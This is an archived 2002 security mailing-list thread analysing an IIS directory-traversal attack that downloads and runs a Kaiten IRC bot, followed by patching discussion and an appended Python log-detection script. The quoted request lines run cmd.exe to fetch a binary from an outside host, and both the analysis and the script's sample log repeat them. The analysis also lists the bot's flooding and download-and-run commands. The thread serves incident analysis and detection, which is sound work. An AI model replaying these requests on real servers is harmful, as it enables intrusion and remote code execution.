From: John Campbell (jcampbell_at_wsipc.org)
Date: Tue Sep 24 2002 - 16:41:28 CDT


    I actually prefer the opportunity to pick and choose. Not all hotfixes
    are necessary for a given installation, and historically at least, they
    aren't regression-tested as fully as service packs (which aren't
    always perfect when they hit the street either).

    If you do a lot of servers, it may make sense to set one up manually,
    test it thoroughly, then clone it with a disk imaging tool.

    -----Original Message-----
    From: zeno [mailto:bugtraq@cgisecurity.net]
    Sent: Tuesday, September 24, 2002 2:08 PM
    To: John Campbell
    Cc: incidents@securityfocus.com
    Subject: Re: new IIS worm? (rcp lsass.exe)

    >
    > Windows Update from you-know-who actually does what you describe. I'd
    > always been leery of it, but tried it out recently when setting up a
    > W2K test server, and it performed as advertised. It did take several
    > iterations to get everything updated, owing to various dependencies.

    When I used windows update it downloaded the patches but didn't install
    them. I had to manually go through each one. While this isn't a big deal,
    I am looking for something 100 percent automated with install of the
    patches. Perhaps I'm missing something; I deal mostly with unix.

    - zeno

    >
    > Regards,
    >
    > John Campbell, CISSP, GCWN
    > Information Security Engineer
    > Washington School Information Processing Cooperative
    > (WSIPC)
    > Everett, Washington, USA
    >
    > -----Original Message-----
    > From: zeno [mailto:bugtraq@cgisecurity.net]
    > Sent: Tuesday, September 24, 2002 11:29 AM
    > To: Mark Challender
    > Cc: 'pje@esec.dk'; incidents@securityfocus.com
    > Subject: Re: new IIS worm? (rcp lsass.exe)
    >
    >
    > >
    > > Hardening of IIS with the tools available at Microsoft and using
    > > URLSCAN with the EXE blocking on will stop these attacks.
    > >
    > > Patch, patch, patch, recheck the patches and use URLSCAN!
    >
    > Does anyone know of a gui windows tool that scans your system and
    > provides you with a list of needed patches, and then allows you to
    > select, and have it autodownload and install them? I can't seem to
    > find one (needed mostly for iis).
    >
    > - zeno@cgisecurity.com
    >
    >
    >
    > >
    > > Mark Challender
    > > Network Administrator
    > >
    > > ==================
    > > Veni, Vidi, Geeki
    > > ==================
    > >
    > >
    > > -----Original Message-----
    > > From: pje@esec.dk [mailto:pje@esec.dk]
    > > Sent: Monday, September 23, 2002 3:27 AM
    > > To: incidents@securityfocus.com
    > > Subject: Re: new IIS worm? (rcp lsass.exe)
    > >
    > >
    > >
    > > Christian Mock:
    > >
    > > >Then it seems to go after the web servers, sending the following:
    > >
    > > >GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+rcp+-b+64.21.95.7.lp:lsass.exe+. HTTP/1.0..
    > >
    > > >and
    > >
    > > >GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+lsass.exe HTTP/1.0
    > >
    > > >I've been able to get hold of that lsass.exe binary (9728 bytes), but
    > > >I lack the skills to analyze it; I'll happily mail it to anybody who
    > > >asks.
    > >
    > >
    > > We have seen this attack from 4 different sources since Sept. 16, and
    > > have informed the owner of 64.21.95.7 and downloaded the lsass.exe for
    > > investigation.
    > >
    > > Based on the attack rate this is most likely a scripted or manual
    > > attack, not a worm.
    > >
    > > Judging from the embedded string in this compressed binary it
    > > appears to be an IRC bot based on the kaiten.c code written by
    > > contem@efnet, the author of the Slapper worm:
    > >
    > > Kaiten Win32 API version 2002 by contem@efnet
    > >
    > > The binary contains these domain names, most likely IRC servers used
    > > for controlling the bot:
    > >
    > > telsa5.mine.nu (Korea)
    > > irc.logicfive.net (Taiwan)
    > > moncredo.shacknet.nu (USA)
    > > telsacredo.shacknet.nu (USA)
    > > lar.ath.cx (Taiwan)
    > >
    > > The program accepts commands to make various DoS attacks or download
    > > new versions or executables with http:
    > >
    > > NOTICE %s :PUSH <target> <port> <secs> = A push flooder
    > > NOTICE %s :TCP <target> <port> <secs> = A syn flooder
    > > NOTICE %s :UDP <target> <port> <secs> = A udp flooder
    > > NOTICE %s :MCON <target> <port> <times> = A connectbomb flooder
    > > NOTICE %s :NICK <nick> = Changes the nick of the client
    > > NOTICE %s :DISABLE <pass> = Disables all packeting from this client
    > > NOTICE %s :ENABLE <pass> = Enables all packeting from this client
    > > NOTICE %s :UPDATE <http address> = Downloads a file off the web and updates the client
    > > NOTICE %s :RUN <http address> = Downloads a file off the web and runs it
    > > NOTICE %s :GET <http address> = Downloads a file off the web
    > > NOTICE %s :ADDSERVER <server> = Adds a server to the list
    > > NOTICE %s :DELSERVER <server> = Deletes a server from the list
    > > NOTICE %s :LISTSERVERS = Lists server on the list
    > > NOTICE %s :KILL = Kills the client
    > > NOTICE %s :VERSION = Requests version of client
    > > NOTICE %s :HELP = Displays this
    > >
    > >
    > > There seems also to be a default account and password in the German
    > > language included in this specific version of Kaiten.
    > >
    > > The IIS attack that tries to inject this Trojan usually has another
    > > URL with "CONNECT chat.vtm.be:6667". This is an attempt to proxy a
    > > connection to port 6667 (IRC) on chat.vtm.be.
    > >
    > >
    > >
    > > Peter Jelver
    > > ...
    > >
    > > eSec A/S
    > >
    > > http://www.esec.dk
    > >
    > >
    > > PGP Fingerprint : 47AF FFEC D48F 9C13 0C4F E687 BB8A 128F D85C A7D7
    > >

    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management
    and tracking system please see: http://aris.securityfocus.com
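As an added example, not code from anyone on this thread, here is a small Python check that runs over constructed IIS-style log lines (method, URI stem, URI query, status) and flags the three things Peter describes: the encoded `..%5c` traversal to cmd.exe (including the double-encoded `%255c` variant), rcp being invoked in the query string to pull the binary down, and a CONNECT to the IRC port. The log layout and the tag names are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed IIS-style log excerpt (method, URI stem, URI query, status). The two
# cmd.exe requests mirror those quoted in the thread; the other lines are made up.
SAMPLE_LOG = """\
GET /default.htm - 200
GET /scripts/..%5c..%5cwinnt/system32/cmd.exe /c+rcp+-b+64.21.95.7.lp:lsass.exe+. 200
GET /scripts/..%5c..%5cwinnt/system32/cmd.exe /c+lsass.exe 200
GET /scripts/..%255c..%255cwinnt/system32/cmd.exe /c+dir 200
CONNECT chat.vtm.be:6667 - 405
GET /images/logo.gif - 200
"""

TRAVERSAL = re.compile(r"\.\.[\\/]")            # ../ or ..\ once decoded
CMD_EXE = re.compile(r"cmd\.exe", re.IGNORECASE)

def decode_fully(s, max_rounds=3):
    # Decode repeatedly so a double-encoded %255c ends up as a backslash too.
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s

def classify(line):
    # Return the tags for one log line; an empty list means nothing matched.
    parts = line.split()
    if len(parts) < 3:
        return []
    method, stem, query = parts[0], parts[1], parts[2]
    tags = []
    decoded_stem = decode_fully(stem)
    if TRAVERSAL.search(decoded_stem) and CMD_EXE.search(decoded_stem):
        tags.append("traversal-to-cmd.exe")
        # '+' stands for a space in the query; flag rcp being used to fetch a file
        if re.search(r"\brcp\b", decode_fully(query).replace("+", " ")):
            tags.append("rcp-in-query")
    if method.upper() == "CONNECT" and stem.endswith(":6667"):
        tags.append("connect-to-irc-port")
    return tags

def scan(log_text):
    # [(line_number, tags)] for every line that received at least one tag
    hits = []
    for number, line in enumerate(log_text.splitlines(), start=1):
        tags = classify(line)
        if tags:
            hits.append((number, tags))
    return hits
```

Running `scan(SAMPLE_LOG)` flags lines 2 to 5 and leaves the two ordinary requests alone; the same decode-then-match logic is what URLSCAN-style filtering has to get right, since a single-pass decoder misses the `%255c` form.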